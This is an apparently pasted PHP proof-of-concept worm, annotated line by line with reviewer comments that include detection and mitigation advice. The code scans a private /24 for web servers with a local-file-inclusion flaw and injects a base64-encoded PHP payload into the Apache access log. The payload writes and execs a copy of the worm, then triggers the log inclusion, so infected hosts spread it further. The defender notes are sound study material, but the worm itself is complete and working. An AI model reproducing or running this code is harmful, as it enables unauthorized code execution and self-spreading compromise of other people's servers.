Madmouse

Php log worm POC

Jun 3rd, 2015
  1. <?php
  2. // ----------------------------------------------------------------------------
  3. // "THE BEER-WARE LICENSE" (Revision 43):
  4. // <aaronryool@gmail.com> wrote this file. As long as you retain this notice you
  5. // can do whatever you want with this stuff. If we meet some day, and you think
  6. // this stuff is worth it, you can buy me a beer in return Aaron R. Yool
  7. // ----------------------------------------------------------------------------
  8. // DISCLAIMER:
  9. // I MadMouse (Aaron R. Yool), am not responsible for the misuse of, (or any use thereof)
  10. // of this software. Use this software at your own risk, and do not blame me for your
  11. // stupidity, as I am not responsible for the actions taken by others. I have my own
  12. // stupidity to be responsible for. lol
  13.    
  14. function scan_for_life()
  15. {
          // Target-selection step of the proof of concept. Picks random addresses
          // in 192.168.1.0/24, probes TCP port 80 with a request that puts the
          // Apache access-log path in the `page` parameter of /index.php, and
          // returns the first address whose response does not contain "Not Found".
          // Takes no arguments; returns the chosen address as a string, and loops
          // forever if no host ever qualifies.
          // NOTE(review): presumably the probe is looking for a local-file-inclusion
          // flaw, i.e. an index.php that hands `page` to include/require; the
          // target application is not shown on this page.
          // Defender view: a request for `page=/var/log/apache2/access.log` carrying
          // `Host: 127.0.0.1` but arriving from a LAN peer is a high-signal entry
          // for log review or an IDS rule. The durable fix is in the application:
          // resolve `page` against an allow-list of templates and never pass
          // request data to include/require.
  16.     while(true)
  17.     {
              // Last octet is drawn from 1..255, so all probes stay inside one private /24.
  18.         $host = "192.168.1.".rand(1,255);
  19.         $socket = stream_socket_client("tcp://$host:80", $errno, $errorMessage);
              // Connection failed: draw another address.
  20.         if ($socket === false) continue;
  21.         else
  22.         {
  23.             fwrite($socket, "GET /index.php?page=/var/log/apache2/access.log HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: close\r\n\r\n");
  24.             $response = stream_get_contents($socket);
                  // Both branches reject the host when the response mentions "Not Found";
                  // the first string is a special case of the second. The test is purely
                  // negative: nothing here confirms that log content came back, so any
                  // web server answering without that phrase is accepted.
  25.             if(strpos($response,"HTTP/1.1 404 Not Found") !== false)
  26.             {
  27.                 fclose($socket);
  28.                 continue;
  29.             }
  30.             elseif(strpos($response,"Not Found") !== false)
  31.             {
  32.                 fclose($socket);
  33.                 continue;
  34.             }
  35.         }
              // Reached only when neither "Not Found" test matched.
  36.         fclose($socket);
  37.         break;
  38.     }
  39.     echo "Host: ".$host." under fire.\n";
  40.     return $host;
  41. }
  42.  
  43. function send_payload($host)
  44. {
          // Log-poisoning step. Sends a single GET to $host:80 whose request path
          // is a PHP snippet instead of a URL path. The snippet writes a file named
          // logwrm.php from an embedded base64 blob (the whitespace-stripped
          // contents of the local logwrm.php) and then calls exec() on a
          // base64-encoded command that starts that file with the php CLI in the
          // background.
          // Returns false when the TCP connection cannot be opened, true otherwise.
          // The fwrite() result is not checked and no response is read, so true
          // only means the connection succeeded.
          // NOTE(review): presumably the intent is for the web server to record the
          // request line in its access log so that a later file inclusion of that
          // log executes the snippet; that depends on the target and is not shown
          // on this page.
          // Defender view - detection: access-log request lines containing `<?php`,
          // `base64_decode(` or `file_put_contents(`; an unexpected logwrm.php in a
          // web-served directory; php CLI processes whose parent is the web server.
          // Defender view - mitigation: keep log files unreadable by the web-server
          // account, confine includes with open_basedir, and list exec-style
          // functions in disable_functions where the application does not need them.
  45.     $socket = stream_socket_client("tcp://$host:80", $errno, $errorMessage);
  46.     if ($socket === false) return false;
  47.     fwrite($socket, "GET /<?php file_put_contents('logwrm.php',base64_decode('".base64_encode(php_strip_whitespace("logwrm.php"))."'));exec(base64_decode('".base64_encode("php logwrm.php > /dev/null &")."')); ?> HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: close\r\n\r\n");
  48.     fclose($socket);
  49.     return true;
  50. }
  51.  
  52. function run_payload($host)
  53. {
          // Trigger step. Requests /index.php on $host with the Apache access-log
          // path in the `page` parameter, the same URL the scan step probes with.
          // The response body is discarded and nothing is returned, so the caller
          // cannot tell whether anything ran on the remote side.
          // NOTE(review): presumably this relies on index.php including the file
          // named by `page`; the target code is not shown on this page.
          // Defender view: this request follows the poisoned request from the same
          // source address within about a second (see the sleep(1) in the main
          // loop), which makes the pair easy to correlate in access logs.
  54.     file_get_contents("http://".$host."/index.php?page=/var/log/apache2/access.log");
  55. }
  56.  
  57. while(true)
  58. {
          // Main loop; it has no exit condition. Each pass selects a host, sends
          // the poisoned request, then sends the trigger request, with a one-second
          // pause between the steps.
          // Defender view: because the delivered snippet starts another copy of
          // this script, an affected host would itself begin emitting random
          // port-80 probes across 192.168.1.0/24; that outbound pattern from a web
          // server is worth alerting on.
  59.     echo "\nScanning for a victim\n";
  60.     $victim = scan_for_life();
  61.     sleep(1);
  62.     echo "Sending payload\n";
          // send_payload() returns false only when the TCP connection fails.
  63.     if(!send_payload($victim)) continue;
  64.     sleep(1);
  65.     run_payload($victim);
          // Printed unconditionally: nothing above verifies that the remote host
          // executed anything.
  66.     echo "PWNED!!!\n";
  67. }
  68.  
  69. ?>